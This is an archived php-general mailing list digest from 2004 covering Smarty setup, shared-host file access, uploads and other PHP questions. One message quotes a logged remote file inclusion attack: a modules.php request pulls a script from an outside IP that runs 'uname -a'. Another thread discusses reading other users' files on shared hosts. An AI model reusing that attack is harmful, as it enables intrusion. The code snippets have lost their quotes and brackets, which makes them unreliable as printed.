php-general Digest 26 Sep 2004 11:43:40 -0000 Issue 3018
php-general Digest 26 Sep 2004 11:43:40 - Issue 3018 Topics (messages 197846 through 197868): Re: Problems installing smarty on a shared host 197846 by: Curt Zirzow 197848 by: Pablo Gosse Re: ftp_put Problems 197847 by: Marek Kilimajer 197849 by: raditha dissanayake Re: is that possible with Objects in php 4 or php5 ? 197850 by: raditha dissanayake Conceptual ?: using 'multi-purpose' form for validation 197851 by: Whil Hentzen 197866 by: Marek Kilimajer php security on shared hosts 197852 by: Pablo Gosse 197853 by: Tim Traver 197858 by: Chris Shiflett 197859 by: Chris Shiflett 197861 by: raditha dissanayake Server's IP Adress 197854 by: Kevin Javia 197855 by: Pahlevanzadeh Mohsen Re: New PHP tutorial - suggestions welcome 197856 by: John Taylor-Johnston 197857 by: Jack Gates OT - HTML Terminal ? 197860 by: Dave Restall - System Administrator,,, 197863 by: Marek Kilimajer What's going on? 197862 by: Phpu 197867 by: Marek Kilimajer Getting Header info with PHP? 197864 by: Nick Wilson Instant messenger 197865 by: Phpu Hacker IP and Script 197868 by: Jason Paschal Administrivia: To subscribe to the digest, e-mail: [EMAIL PROTECTED] To unsubscribe from the digest, e-mail: [EMAIL PROTECTED] To post to the list, e-mail: [EMAIL PROTECTED] -- ---BeginMessage--- * Thus wrote Pablo Gosse: Hi folks. I've recently moved my site to a shared host, and this is the first time I've had to set up my site in a really restrictive environment, and I'm running into problems getting smarty installed. Using the basic example set up from the Smarty docs, when I run the file I get the following error: Warning: main(Smarty.class.php): failed to open stream: No such file or directory in /home/virtual/site357/fst/var/www/html/smarty.php on line 4 Fatal error: main(): Failed opening required 'Smarty.class.php' (include_path='.:/php/includes:/usr/share/php:/home/pablogosse/smarty/') in /home/virtual/site357/fst/var/www/html/smarty.php on line 4 Now, as you can see by the value of my include path, I've got the path to smarty added, but it's still not finding the file even though /home/pablogosse/smarty/Smarty.class.php does indeed exist. You'll probably notice that the permissions for /home/pablogosse are like: drwxr-x--- with user:group pablogosse:pablogosse If you have permissions to, i would set up a directory like: /home/virtual/site357/fst/var/include/smarty/ And then set the include_path appropriatly. Curt -- The above comments may offend you. flame at will. ---End Message--- ---BeginMessage--- [snip] You'll probably notice that the permissions for /home/pablogosse are like: drwxr-x--- with user:group pablogosse:pablogosse If you have permissions to, i would set up a directory like: /home/virtual/site357/fst/var/include/smarty/ And then set the include_path appropriatly. [/snip] Unfortunately I don't have write access to /var as it is owned by root. I've just discovered another thing which makes me even more nervous. I just wrote a script as a quick test and I was able to use file_get_contents to read a file out of another user's webroot. So, anyone who is storing passwords or other valuable information under their webroot risks having that information being easily accessible to anyone else hosting here. As I said earlier, most of my experience until now has been in situations where the sites I've worked on have been hosted on dedicated servers, and this has never been a problem. Is this a common set up for shared hosting? Is there any way around this? Cheers and TIA, Pablo ---End Message--- ---BeginMessage--- Julian wrote: well, i suspect i am at a dead end. here is the layout of things. we want to put up an internet kiosk at certain thoroughbred auctions to allow people to send ecards as well as contact associates. we have a web cam on the kiosk and a partner came up with the idea of letting them send photos of themselves as well. the problem is i cannot find a way to use the form type FILE without giving the user access to everything on the kiosk computer. try as i might i cannot get around that browse button. so i thought i would try the ftp functions which i am totally unfamiliar with. i do truly appreciate the time you and others took to look into this. You can setup a apache and php on the kiosk machine. Document root will be the folder where the webcam stores images, or just one directory up. You can create a simple php script that will let them browse the pictures (only the pictures :)), or not so simple that will allow them to make some adjustments to the pictures using image functions. When everything is ready, with a press of a button then can mail the ecards. What
[PHP] OT - HTML Terminal ?
Hi, this is severely off topic so please feel free to ignore it :-) I have an intranet application that currently is accessed using a browser, no problems there, however I have been asked if I can get rid of the browser so that the user's are not encouraged to surf so readily. I initially thought simple - start the browser with the correct home page as a command line argument and turn off all the tool bars etc. so that it looks like an xterm (dos window) and of course they can only then click on the links we provide. It's not meant to be foolproof and a dedicated hacker could circumvent the system, however most users won't bother. I don't particularly want to go the F11 (full screen) route and would like something easy to install if possible, e.g. a single .exe, Lynx seemed a good point to start but I think that would freak out just about all the end users :-) Does anybody have any POLITE suggestions or any experience of something similar and can let me in on the secret ? I have tried google, mozilla m$ the nearest I have come so far is IEAK. TTFN, Dave php/2004-09-26.tx php-general ++ | Dave Restall, IIRC Limited, PO Box 46, Skelton, Cleveland, TS12 2GT. | | Tel. 0845 10 80 151Mob. +44 (0) 7973 831245 Int. +44 (0) 1287 653003 | | email : [EMAIL PROTECTED] [EMAIL PROTECTED] Web : http://www.iirc.net | ++ | I have learned To spell hors d'oeuvres Which still grates on Some | | people's n'oeuvres.| | -- Warren Knox | ++ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php security on shared hosts
Pablo Gosse wrote: Hi folks. I recently set up hosting for my site and have noticed something which is making me nervous. If you are really nervous you cannot use shared hosting. Simple as that. Even if other users don't access your stuff, the root user can. While it's against the system administrators code of conduct to look into other user's files, you cannot rule out the possibility of someone taking a peek. As chris has pointed out safe mode is no protection. On some servers (not all) you can try changing your home directory permissions to remove others' read and others' execute to get an additional measure of protection. -- Raditha Dissanayake. http://www.radinks.com/sftp/ | http://www.raditha.com/megaupload Lean and mean Secure FTP applet with | Mega Upload - PHP file uploader Graphical User Inteface. Just 128 KB | with progress bar. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] What's going on?
For the last 2 days i haven't received emails. What's going on with this mailing list?
Re: [PHP] OT - HTML Terminal ?
Dave Restall - System Administrator,,, wrote: Hi, this is severely off topic so please feel free to ignore it :-) I have an intranet application that currently is accessed using a browser, no problems there, however I have been asked if I can get rid of the browser so that the user's are not encouraged to surf so readily. I initially thought simple - start the browser with the correct home page as a command line argument and turn off all the tool bars etc. so that it looks like an xterm (dos window) and of course they can only then click on the links we provide. It's not meant to be foolproof and a dedicated hacker could circumvent the system, however most users won't bother. I don't particularly want to go the F11 (full screen) route and would like something easy to install if possible, e.g. a single .exe, Lynx seemed a good point to start but I think that would freak out just about all the end users :-) Does anybody have any POLITE suggestions or any experience of something similar and can let me in on the secret ? I have tried google, mozilla m$ the nearest I have come so far is IEAK. You can rewrite the interface in XUL for mozilla: http://www.xulplanet.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Getting Header info with PHP?
Hi everyone, Can anyone tell me which functions/areas i need to look at to do the following? * I need to check a proxy server. * I want to have the proxy fetch a php page at my site * my php page should show me *every* header the proxy server sends Is that possible? much thanks, and have a nice sunday morning ;-) -- Nick W -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Instant messenger
Hi, I wanna create an instant private messenger. This kind of IM i have seen on dating sites. I've googled for such IM but i found nothing. Can someone please help me with this? Thank you
Re: [PHP] Conceptual ?: using 'multi-purpose' form for validation
Whil Hentzen wrote: I can get a single form to call itself again if there's nothing fancy going on. This code will prompt the user for their mail if it doesn't already exist, and if the email does exist, provides some data out of database. ?php $email = (isset($_POST['email']) ? $_POST['email'] : ''); if ( !validate_email($email) ): ? !-- No email, so prompt the user for one.-- form action=?=$_SERVER['PHP_SELF']? method=post Login: input type=text name=email / input type=submit value=GO / /form ?php else: ? pData for email: ?=$_GET['email']?/p // do some database stuff and display the results ?php endif; ? I'd like to validate the email that was entered against a database - if the email address is found, continue on with the ELSE code. If not found, though, run the IF section again. Conceptually I'm missing how to do that. I've done it in two pages, where the form action calls a second PHP page, and the code in that second page looks for the address and displays one result or another depending on if it's found. How do I do this in one page, if it's appropriate and practical (i.e. good coding) to do so? Thanks, Whil -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] What's going on?
Phpu wrote: For the last 2 days i haven't received emails. What's going on with this mailing list? It might have something to do with the fact your clock is 2 days behind. Have you been time travelling? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Hacker IP and Script
This is of questionable relevance, but I'm sure it can serve to heighten awareness of vulnerabilities for those PHP'ers with similar scripts that involve loading files based upon query string info. We have installed Admin Secure over our PHP-Nuke CMS, and Admin Secure recently sent us an email of a thwarted hacking attempt: Admin Secure detecting invalid file inclusion passed to index.php or modules.php files. This could be possible cross-site scripting (XSS) hack attempt to your site. For security reason, this attempt has been blocked by Admin Secure to protect your website. Admin Secure has been collecting the following information: - Date: 26 September 2004, 01:05 - IP Address: 193.150.170.160 - User-agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled) - Request: /modules.php?name=http://193.150.170.160/4do4sjr?sa=http://193.150.170.160/4do4sjr?year=http://193.150.170.160/4do4sjr?month=http://193.150.170.160/4do4sjr?month_l=http://193.150.170.160/4do4sjr? - Variable: $name = http://193.150.170.160/4do4sjr? Whois Information. --- The link he was trying to get our scripts to load, http://193.150.170.160/4do4sjr? , displays this: ?php echo \nbl3; echo bl3 ; passthru(uname -a 21); ? Which would, from what I've read about the uname command, give him info about our web server, and from there he would have an idea of which vulnerabilities to exploit. What would you guys do with the attack information (IP, WHOIS)? Send a detailed email to the addresses listed in the WHOIS records? I'm not sweating it, just curious. Thank you, ~Jason -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hacker IP and Script
I would remove bad scripts like *Nuke. Their code just sucks and has really lots of bugs. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Problem with uploaded file
Hello folks, I'm facing some sort of problem here. I'm uploading a file from the clients system to the server. Everything working fine except that the file that is being uploaded is having a file permission of 600 ie only read and write to the owner only. So i'm not able to change the permissions (either with some ftp client or thru the file manager on the server) nor am i able to download the file even. Is there any way that i can set permissions to the files that are being uploaded.?? here is the code is used... $uploaddir = './photos/'; print pre; $arr_basename=explode(.,$_FILES['userfile0']['name']); $file_type=$arr_basename[1]; $nameofphoto=$profileid.1..$file_type; @move_uploaded_file($_FILES['userfile0']['tmp_name'], $uploaddir . $nameofphoto); $uploaddir = './photos/'; print pre; $arr_basename=explode(.,$_FILES['userfile1']['name']); $file_type=$arr_basename[1]; $nameofphoto1=$profileid.2..$file_type; @move_uploaded_file($_FILES['userfile1']['tmp_name'], $uploaddir . $nameofphoto1); $uploaddir = './photos/'; print pre; --- plzz help me out.. /sagar
[PHP] Re: Problem with uploaded file
Sagar
This is the code I use to change file permissions on a file that has been
uploaded by a user to a predefined area with a predefined filename:
// Change File Permissions:
chmod({$uploadfile}, 0644);
--
-
Michael Mason
Arras People
www.arraspeople.co.uk
-
Sagar C Nannapaneni [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]
Hello folks,
I'm facing some sort of problem here. I'm uploading a file from
the clients system to the server. Everything working fine except
that the file that is being uploaded is having a file permission of
600 ie only read and write to the owner only.
So i'm not able to change the permissions (either with some ftp
client or thru the file manager on the server) nor am i able to
download the file even.
Is there any way that i can set permissions to the files that are
being uploaded.??
here is the code is used...
$uploaddir = './photos/';
print pre;
$arr_basename=explode(.,$_FILES['userfile0']['name']);
$file_type=$arr_basename[1];
$nameofphoto=$profileid.1..$file_type;
@move_uploaded_file($_FILES['userfile0']['tmp_name'], $uploaddir .
$nameofphoto);
$uploaddir = './photos/';
print pre;
$arr_basename=explode(.,$_FILES['userfile1']['name']);
$file_type=$arr_basename[1];
$nameofphoto1=$profileid.2..$file_type;
@move_uploaded_file($_FILES['userfile1']['tmp_name'], $uploaddir .
$nameofphoto1);
$uploaddir = './photos/';
print pre;
---
plzz help me out..
/sagar
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] GLOBAL reserved word
Dears,We can introduce a external variable to our
function with GLOBAL reserved word.same following :
?
$n=3
function nn()
{
global $n;
echo $n;
}//end of func
?
But i need to introduce a array.Name of my array is
month.
I typed global $month;.But it didn't work.
Please guide me until i can use an external array.
Yours,Mohsen.
=
-DIGITAL SIGNATURE---
///Mohsen Pahlevanzadeh
Network administrator programmer
My home phone is: +98213810146
My email address is
m_pahlevanzadeh at yahoo dot com
My website is: http://webnegar.net
___
Do you Yahoo!?
Declare Yourself - Register online to vote today!
http://vote.yahoo.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] GLOBAL reserved word
Pahlevanzadeh Mohsen wrote:
Dears,We can introduce a external variable to our
function with GLOBAL reserved word.same following :
?
$n=3
function nn()
{
global $n;
echo $n;
}//end of func
?
But i need to introduce a array.Name of my array is
month.
I typed global $month;.But it didn't work.
Please guide me until i can use an external array.
Yours,Mohsen.
It works, you have error somewhere else:
?
$month= array('January', 'February', 'March');
function nn()
{
global $month;
echo $month[0];
}
nn();
?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: simple templateing
On 25 Sep 2004 19:51:46 -, Matthew Weier O'Phinney [EMAIL PROTECTED] wrote: I use Smarty. The thing about Smarty is it can be as simple or as complex as you want it. I personally feel you could do exactly as you describe with it -- just tell your designers the bare minimum of what you will allow in a template. I'd second the recommendation of Smarty -- as Matthew implies, you can set it up to only allow a restricted set of tags in templates, and you can define what those tags are so that they are intuitive to your template-editing users. pb -- paul bissex, e-scribe.com -- database-driven web development 413.585.8095 69.55.225.29 01061-0847 72°39'71W 42°19'42N -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php security on shared hosts
Chris, I believe that is the reason that the PHP group came up with the open_basedir directive. The open_basedir prevents you from looking into anything higher than a particular directory tree using PHP. So, a combination of safe_mode and open_basedir should prevent your script from being able to walk the tree. Is there some way to get around open_basedir ? I didn't think there was, and if there is, then we better post that to the security guys at php, cause that's not good. Yes, there are many scripts that assume no safe_mode, and therefor do not work. It usually means they are trying to do something a little more powerful with the filesystem, or system commands, and shared hosts don't want random system commands being run on the machines...;) Am I saying its perfect ? No. I think it should be pretty safe though if implemented correctly. Tim. At 09:47 PM 9/25/2004, Chris Shiflett wrote: --- Tim Traver [EMAIL PROTECTED] wrote: I can guarantee that is not the way it is supposed to be. We make sure that can't happen by running in Safe mode, using the open_basedir directive, and making sure the directory tree has the correct permissions so the situation you described cannot happen. The safe_mode and open_basedir directives are certainly no protection. I'm curious what sort of permissions you are using that prevents this scenario, since it seems impossible to me. If the legitimate developer can include code using include or require, it means the Web server must be able to read those files. The exception would be if you're running each user in a chroot jail or something, mimicking a dedicated environment. So, I'd say that your shared host is doing a poor job of implementing PHP. I used to think the same, but I've changed my mind, because: 1. safe_mode is no protection. 2. Many prepackaged PHP applications don't work with safe_mode enabled. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming December 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php SimpleNet's Back ! http://www.simplenet.com
Re: [PHP] php security on shared hosts
Oh, and I forgot, you can also specify specific include directories to be allowed for a particular user... Tim. At 09:47 PM 9/25/2004, Chris Shiflett wrote: --- Tim Traver [EMAIL PROTECTED] wrote: I can guarantee that is not the way it is supposed to be. We make sure that can't happen by running in Safe mode, using the open_basedir directive, and making sure the directory tree has the correct permissions so the situation you described cannot happen. The safe_mode and open_basedir directives are certainly no protection. I'm curious what sort of permissions you are using that prevents this scenario, since it seems impossible to me. If the legitimate developer can include code using include or require, it means the Web server must be able to read those files. The exception would be if you're running each user in a chroot jail or something, mimicking a dedicated environment. So, I'd say that your shared host is doing a poor job of implementing PHP. I used to think the same, but I've changed my mind, because: 1. safe_mode is no protection. 2. Many prepackaged PHP applications don't work with safe_mode enabled. Hope that helps. Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming December 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ SimpleNet's Back ! http://www.simplenet.com
Re: [PHP] php security on shared hosts
Tim Traver wrote: Chris, I believe that is the reason that the PHP group came up with the open_basedir directive. The open_basedir prevents you from looking into anything higher than a particular directory tree using PHP. So, a combination of safe_mode and open_basedir should prevent your script from being able to walk the tree. Is there some way to get around open_basedir ? Only if you are able to execute commands outside of php, what Pablo is. I didn't think there was, and if there is, then we better post that to the security guys at php, cause that's not good. Yes, there are many scripts that assume no safe_mode, and therefor do not work. It usually means they are trying to do something a little more powerful with the filesystem, or system commands, and shared hosts don't want random system commands being run on the machines...;) Am I saying its perfect ? No. I think it should be pretty safe though if implemented correctly. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Best way to save preferences?
Which is the best way to save preferences (for a site) to make them easily accessable for changes? What I want is a way to save arrays and read them in again without having to use a database Thankful for suggests, sincerely Victor -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Post vars without using html form
Does anybody know, how to post vars without using html. I'd like to send data to an external website and receive the http answer. The external website awaits post vars from a form. Tanks, Harry -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] 9 line function logic problem
Hi,
I am going crazy with this function please have a look
at it and tell me what i am doing wrong.
This is my setup:
I have a file called one.html.cache in the directory
/cache/
in one.html.cache I have a time()+ 3600 number (eg:
1096224755)
I need to know if the number in that file is still
bigger than the present time() or not
the problem is, it is always returning zero...
heres the function:
echo b.is_cache(one.html);
function is_cache($get_file)
{
$th_file = $include_path.$get_file . '.cache';
$fp = fopen($th_file, 'a+');
fseek($fp, 0);
$rd = fread($fp, filesize($th_file));
fclose($fp);
if (time() - $rd 5)
return 0;
else
return 1;
}
What am i doing wrong? or is there a better way of
doing this?
Thanks,
Mag
=
--
- The faulty interface lies between the chair and the keyboard.
- Creativity is great, but plagiarism is faster!
- Smile, everyone loves a moron. :-)
__
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.
http://mobile.yahoo.com/maildemo
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Best way to save preferences?
You should use XML files,But XML files will be lock when you want to multiuser read it. Also arrays is having overhead for your server.Best way is using databses. Yours,Mohsen. --- Victor Spång Arthursson [EMAIL PROTECTED] wrote: Which is the best way to save preferences (for a site) to make them easily accessable for changes? What I want is a way to save arrays and read them in again without having to use a database Thankful for suggests, sincerely Victor -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php = -DIGITAL SIGNATURE--- ///Mohsen Pahlevanzadeh Network administrator programmer My home phone is: +98213810146 My email address is m_pahlevanzadeh at yahoo dot com My website is: http://webnegar.net __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Post vars without using html form
You must use Socket Programming. PHP have been supported socket programming. You can choose port 80 then use its functions. Yours,Mohsen --- Harry.de [EMAIL PROTECTED] wrote: Does anybody know, how to post vars without using html. I'd like to send data to an external website and receive the http answer. The external website awaits post vars from a form. Tanks, Harry -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php = -DIGITAL SIGNATURE--- ///Mohsen Pahlevanzadeh Network administrator programmer My home phone is: +98213810146 My email address is m_pahlevanzadeh at yahoo dot com My website is: http://webnegar.net ___ Do you Yahoo!? Declare Yourself - Register online to vote today! http://vote.yahoo.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Version Controlling
This is slightly off topic, but I feel it's a little something that's worthy of discussion here. I've been interested in running CVS for a while now, but being on a Windows machine is holding me back somewhat, and I'm not entirely sure CVS is even something I need. Basically, I have some computers, mostly my laptop and desktop, and I want to be able to sync them based on version controlling, much like CVS, but I'm not sure if it's too advanced or not. My basic question is: What do you do, if anything, for syncing/version control between your computers for your web development projects? WiredPHP Stephen Craton Web Developer IM: [EMAIL PROTECTED] http://www.wiredphp.us -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Best way to save preferences?
Pahlevanzadeh Mohsen wrote: You should use XML files,But XML files will be lock when you want to multiuser read it. It's not necessery to lock files for reading. Also arrays is having overhead for your server.Best way is using databses. Yours,Mohsen. --- Victor Spng Arthursson [EMAIL PROTECTED] wrote: Which is the best way to save preferences (for a site) to make them easily accessable for changes? ini files, pure php (fastest), some custom format (slowest) What I want is a way to save arrays and read them in again without having to use a database Thankful for suggests, sincerely Victor -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php = -DIGITAL SIGNATURE--- ///Mohsen Pahlevanzadeh Network administrator programmer My home phone is: +98213810146 My email address is m_pahlevanzadeh at yahoo dot com My website is: http://webnegar.net __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Best way to save preferences?
On Monday 27 September 2004 01:00, Victor Spng Arthursson wrote: Which is the best way to save preferences (for a site) to make them easily accessable for changes? What I want is a way to save arrays and read them in again without having to use a database serialize(). Or if you want to use databases but do not want to run a full blown database server then check out sqlite. -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* Never sleep with anyone crazier than yourself -- Murphy's Laws on Sex n14 */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Best way to save preferences?
Dear,I mean that you can't read XML file in multiuser mode. --- Marek Kilimajer [EMAIL PROTECTED] wrote: Pahlevanzadeh Mohsen wrote: You should use XML files,But XML files will be lock when you want to multiuser read it. It's not necessery to lock files for reading. Also arrays is having overhead for your server.Best way is using databses. Yours,Mohsen. --- Victor Spång Arthursson [EMAIL PROTECTED] wrote: Which is the best way to save preferences (for a site) to make them easily accessable for changes? ini files, pure php (fastest), some custom format (slowest) What I want is a way to save arrays and read them in again without having to use a database Thankful for suggests, sincerely Victor -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php = -DIGITAL SIGNATURE--- ///Mohsen Pahlevanzadeh Network administrator programmer My home phone is: +98213810146 My email address is m_pahlevanzadeh at yahoo dot com My website is: http://webnegar.net __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail = -DIGITAL SIGNATURE--- ///Mohsen Pahlevanzadeh Network administrator programmer My home phone is: +98213810146 My email address is m_pahlevanzadeh at yahoo dot com My website is: http://webnegar.net ___ Do you Yahoo!? Declare Yourself - Register online to vote today! http://vote.yahoo.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Version Controlling
Stephen Craton wrote: This is slightly off topic, but I feel it's a little something that's worthy of discussion here. I've been interested in running CVS for a while now, but being on a Windows machine is holding me back somewhat, and I'm not entirely sure CVS is even something I need. Basically, I have some computers, mostly my laptop and desktop, and I want to be able to sync them based on version controlling, much like CVS, but I'm not sure if it's too advanced or not. My basic question is: What do you do, if anything, for syncing/version control between your computers for your web development projects? rsync, some files are excluded -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Version Controlling
Stephen Craton wrote: This is slightly off topic, but I feel it's a little something that's worthy of discussion here. I've been interested in running CVS for a while now, but being on a Windows machine is holding me back somewhat, and I'm not entirely sure CVS is even something I need. Basically, I have some computers, mostly my laptop and desktop, and I want to be able to sync them based on version controlling, much like CVS, but I'm not sure if it's too advanced or not. My basic question is: What do you do, if anything, for syncing/version control between your computers for your web development projects? There are many solutions, but better than using a constant version control system like CVS or subversion is to use cvs/subversion for development only. When things seem to be working, make a release tag, and bundle up that code as a package. You can either zip it up and unzip on the production server, or use the pear installer's built-in capabilities to customize things. This strategy is much better, because if it turns out a slight difference between your computers breaks the code, you can quickly and easily revert to an earlier release (especially if you use the pear installer). If you use the PEAR installer, you can also use the dependencies feature to split your code up into smaller chunks, making maintenance of large projects even simpler. use TortoiseCVS, you will never have doubts about how easy it is to use cvs on windows again. Greg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Post vars without using html form
* and then Pahlevanzadeh Mohsen declared You must use Socket Programming. PHP have been supported socket programming. You can choose port 80 then use its functions. There is an easier way. Use the cURL functions: very simple and doing a search for curl php tutorial or similar will help you out :-) -- Nick W -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php security on shared hosts
--- Tim Traver [EMAIL PROTECTED] wrote: I believe that is the reason that the PHP group came up with the open_basedir directive. The open_basedir prevents you from looking into anything higher than a particular directory tree using PHP. So, a combination of safe_mode and open_basedir should prevent your script from being able to walk the tree. We know what these directives do. I think you're missing the point. How can a PHP directive offer any protection against someone writing a CGI that reads a file somewhere? Think about it. I didn't think there was, and if there is, then we better post that to the security guys at php, cause that's not good. We know that neither safe_mode nor open_basedir offer protection from this. We also know that it's impossible to solve this problem at the PHP level, because it is completely independent of PHP. I think it should be pretty safe though if implemented correctly. If you do not offer CGI access or any interpreter besides PHP, then I suppose it's better than nothing, but I wouldn't characterize this as safe. I suspect that if I were a user on this host, I could give you a URL that displays another account's password within a few minutes. But, I'm just speculating. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly Coming December 2004 HTTP Developer's Handbook - Sams http://httphandbook.org/ PHP Community Site http://phpcommunity.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] RE: Version Controlling
Thanks for the info, but I do have an extra question about CVS. Do I always need access to the internet to get my files to work one them? If I were to go out of town and not have access to the internet, how could I still work on my files? WiredPHP Stephen Craton Web Developer IM: [EMAIL PROTECTED] http://www.wiredphp.us :: -Original Message- :: From: Greg Beaver [mailto:[EMAIL PROTECTED] :: Sent: Sunday, September 26, 2004 13:22 :: To: Stephen Craton :: Cc: 'PHP List' :: Subject: Re: Version Controlling :: :: Stephen Craton wrote: :: This is slightly off topic, but I feel it's a little something that's :: worthy :: of discussion here. I've been interested in running CVS for a while :: now, but :: being on a Windows machine is holding me back somewhat, and I'm not :: entirely :: sure CVS is even something I need. :: :: Basically, I have some computers, mostly my laptop and desktop, and I :: want :: to be able to sync them based on version controlling, much like CVS, :: but I'm :: not sure if it's too advanced or not. :: :: My basic question is: What do you do, if anything, for syncing/version :: control between your computers for your web development projects? :: :: There are many solutions, but better than using a constant version :: control system like CVS or subversion is to use cvs/subversion for :: development only. When things seem to be working, make a release tag, :: and bundle up that code as a package. You can either zip it up and :: unzip on the production server, or use the pear installer's built-in :: capabilities to customize things. :: :: This strategy is much better, because if it turns out a slight :: difference between your computers breaks the code, you can quickly and :: easily revert to an earlier release (especially if you use the pear :: installer). If you use the PEAR installer, you can also use the :: dependencies feature to split your code up into smaller chunks, making :: maintenance of large projects even simpler. :: :: use TortoiseCVS, you will never have doubts about how easy it is to use :: cvs on windows again. :: :: Greg :: -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] PHP Counter?
Hi all, I have a script that at the present just outputs '$count .'br /'' after each iteration of a foreach() loop. I have set implicit_flush so that this works. That's clearly monkey poo though eh? :-) Do I have to get into unkown waters and try and make PHP talk to JS to achieve a kind of 'hit counter' like effect or is there some easier way? ::explanation It should print the $count var after each iteration *replacing* the last $count Im stumped. A little guidance would be much appreciated... -- Nick W -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Best way to save preferences?
Pahlevanzadeh Mohsen wrote: Dear,I mean that you can't read XML file in multiuser mode. Can you elaborate? And what about other files? Are they different? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Testing Response of A Proxy with PHP?
hi again all, I cant find any functions that might help me test the response of a proxy server b4 attempting to use it. Do i need to use exec() with ping? Anyone know how to do that? (if that's the case...) mucho grassy arse.. -- Nick W -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Testing Response of A Proxy with PHP?
Nick Wilson wrote: hi again all, I cant find any functions that might help me test the response of a proxy server b4 attempting to use it. Do i need to use exec() with ping? Anyone know how to do that? (if that's the case...) mucho grassy arse.. What kind of response? If the server is alive, if the proxy is alive? If an url exists? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Testing Response of A Proxy with PHP?
* and then Marek Kilimajer declared I cant find any functions that might help me test the response of a proxy server b4 attempting to use it. Do i need to use exec() with ping? Anyone know how to do that? (if that's the case...) What kind of response? If the server is alive, if the proxy is alive? If an url exists? hehe, good point! Just if the server is alive i guess. I want to use the proxy and want to test if it's responsive b4 i attempt to use it... -- Nick W -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php security on shared hosts
